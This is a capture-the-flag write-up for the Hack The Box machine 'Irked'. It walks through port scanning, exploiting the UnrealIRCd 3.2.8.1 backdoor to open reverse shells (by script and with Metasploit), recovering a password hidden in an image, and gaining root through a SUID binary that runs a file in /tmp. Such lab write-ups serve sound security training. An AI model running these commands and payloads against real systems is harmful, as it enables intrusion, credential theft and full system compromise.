HTB Irked writeup (IRC backdoor; an image hides information usable for privilege escalation; SUID hijack yields high privileges)
Veterans, please ignore this!
Irked attack key points:
★ UnrealIRCd 3.2.8.1 - Backdoor Command Execution
★ Information disclosure in the home directory
★ suid + third-party software
Information gathering
nmap
└─$ nmap -p- -sCV --min-rate 1000 10.10.10.117
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-06 17:12 CST
Nmap scan report for 10.10.10.117
Host is up (0.27s latency).
Not shown: 65018 closed tcp ports (reset), 510 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39200/tcp6 status
| 100024 1 43182/tcp status
| 100024 1 48805/udp6 status
|_ 100024 1 51447/udp status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
43182/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 284.34 seconds
└─$ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 111,6697,8067,43182,65534 --min-rate 1000 10.10.10.117
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-06 17:41 CST
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39200/tcp6 status
| 100024 1 43182/tcp status
| 100024 1 48805/udp6 status
|_ 100024 1 51447/udp status
6697/tcp open irc UnrealIRCd
| irc-botnet-channels:
|_ ERROR: Closing Link: [10.10.16.14] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.
8067/tcp open irc UnrealIRCd
| irc-botnet-channels:
|_ ERROR: Closing Link: [10.10.16.14] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.
43182/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
| irc-botnet-channels:
|_ ERROR: Closing Link: [10.10.16.14] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
From the nmap scan we know the target exposes SSH on port 22, HTTP on port 80, rpcbind on ports 111 and 43182, and IRC on ports 6697, 8067 and 65534. The domain name is irked.htb. Add irked.htb to /etc/hosts; we also obtained an email address, djmardov@irked.htb.
echo 10.10.10.117 irked.htb | sudo tee -a /etc/hosts
HTTP
http://irked.htb/

Accessing the site by IP and by domain name returns the same content.
gobuster directory and file brute-force
└─$ gobuster dir -u http://irked.htb/ -t 100 -o gobuster.log --no-error -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,php,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://irked.htb/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 72]
/.html (Status: 403) [Size: 289]
/manual (Status: 301) [Size: 307] [--> http://irked.htb/manual/]
/.html (Status: 403) [Size: 289]
/server-status (Status: 403) [Size: 297]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================

The default page contains nothing exploitable.
ffuf subdomain enumeration
└─$ ffuf -u http://irked.htb/ -H "Host: FUZZ.irked.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 -fw 5
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://irked.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.irked.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 5
________________________________________________
:: Progress: [114441/114441] :: Job [1/1] :: 499 req/sec :: Duration: [0:04:17] :: Errors: 0 ::
No subdomains were found.
IRC information gathering
Install hexchat
sudo apt install hexchat -y
Launch it
hexchat

No usable channels were found, but the version string Unreal3.2.8.1 was discovered.
Shell as ircd
Without metasploit
└─$ python exploit.py 10.10.10.117 6697 -payload python
Exploit sent successfully!
└─$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.10.16.14] from (UNKNOWN) [10.10.10.117] 59867
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
ircd@irked:~/Unreal3.2$
Upgrade to a fully interactive shell
ircd@irked:~/Unreal3.2$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
ircd@irked:~/Unreal3.2$ ^Z
zsh: suspended nc -lvnp 9000
└─$ stty raw -echo;fg
[1] + continued nc -lvnp 9000
export TERM=xterm
ircd@irked:~/Unreal3.2$ stty rows 29 columns 119
ircd@irked:~/Unreal3.2$
With metasploit
└─$ msfconsole
Metasploit tip: Writing a custom module? After editing your module, why not try
the reload command
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
https://metasploit.com
=[ metasploit v6.4.61-dev ]
+ -- --=[ 2515 exploits - 1292 auxiliary - 431 post ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search exploit/unix/irc/unreal_ircd_3281_backdoor
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 > use 0
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usi
ng-metasploit.html
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/adduser . normal No Add user with useradd
1 payload/cmd/unix/bind_perl . normal No Unix Command Shell, Bind TCP (via Perl)
2 payload/cmd/unix/bind_perl_ipv6 . normal No Unix Command Shell, Bind TCP (via perl) IPv6
3 payload/cmd/unix/bind_ruby . normal No Unix Command Shell, Bind TCP (via Ruby)
4 payload/cmd/unix/bind_ruby_ipv6 . normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
5 payload/cmd/unix/generic . normal No Unix Command, Generic Command Execution
6 payload/cmd/unix/reverse . normal No Unix Command Shell, Double Reverse TCP (telnet)
7 payload/cmd/unix/reverse_bash_telnet_ssl . normal No Unix Command Shell, Reverse TCP SSL (telnet)
8 payload/cmd/unix/reverse_perl . normal No Unix Command Shell, Reverse TCP (via Perl)
9 payload/cmd/unix/reverse_perl_ssl . normal No Unix Command Shell, Reverse TCP SSL (via perl)
10 payload/cmd/unix/reverse_ruby . normal No Unix Command Shell, Reverse TCP (via Ruby)
11 payload/cmd/unix/reverse_ruby_ssl . normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
12 payload/cmd/unix/reverse_ssl_double_telnet . normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload payload/cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usi
ng-metasploit.html
RPORT 6667 yes The target port (TCP)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.10.10.117
RHOSTS => 10.10.10.117
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
RPORT => 6697
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.10.16.14
LHOST => 10.10.16.14
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.117 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usi
ng-metasploit.html
RPORT 6697 yes The target port (TCP)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.16.14 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 10.10.16.14:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Command shell session 1 opened (10.10.16.14:4444 -> 10.10.10.117:52963) at 2025-11-07 15:40:34 +0800
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
Shell as djmardov
List the users on the target
ircd@irked:/home/djmardov$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
ircd:x:1001:1001::/home/ircd:/bin/sh
Information collected
ircd@irked:/home/djmardov/Documents$ cat /home/djmardov/Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
Download the image
└─$ wget http://10.10.10.117/irked.jpg
--2025-11-07 15:57:22-- http://10.10.10.117/irked.jpg
Connecting to 10.10.10.117:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: ‘irked.jpg’
irked.jpg 100% 33.88K 57.7KB/s in 0.6s
2025-11-07 15:57:23 (57.7 KB/s) - ‘irked.jpg’ saved [34697/34697]
Extract the password
└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
└─$ cat pass.txt
Kab6h+m+bbp2J:HG
ssh djmardov@10.10.10.117
└─$ ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ id
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
djmardov@irked:~$
Shell as root
suid
When a file has the SUID bit set, it executes with the privileges of the file's owner rather than those of the caller; this is commonly used to let ordinary users run programs that need elevated privileges.
djmardov@irked:~$ find / -perm -4000 -type f 2>/dev/null -exec ls -la {} \;
-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
/usr/bin/viewuser
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2025-11-07 02:02 (:0)
djmardov pts/2 2025-11-07 02:36 (10.10.16.14)
sh: 1: /tmp/listusers: not found
djmardov@irked:~$ ls -la /tmp/listusers
ls: cannot access /tmp/listusers: No such file or directory
The file /tmp/listusers does not exist, so create /tmp/listusers, make it executable, and put id in it.
djmardov@irked:~$ echo id > /tmp/listusers
djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2025-11-07 02:02 (:0)
djmardov pts/2 2025-11-07 02:36 (10.10.16.14)
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root
Put bash in it
djmardov@irked:~$ echo bash > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2025-11-07 02:02 (:0)
djmardov pts/2 2025-11-07 02:36 (10.10.16.14)
root@irked:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)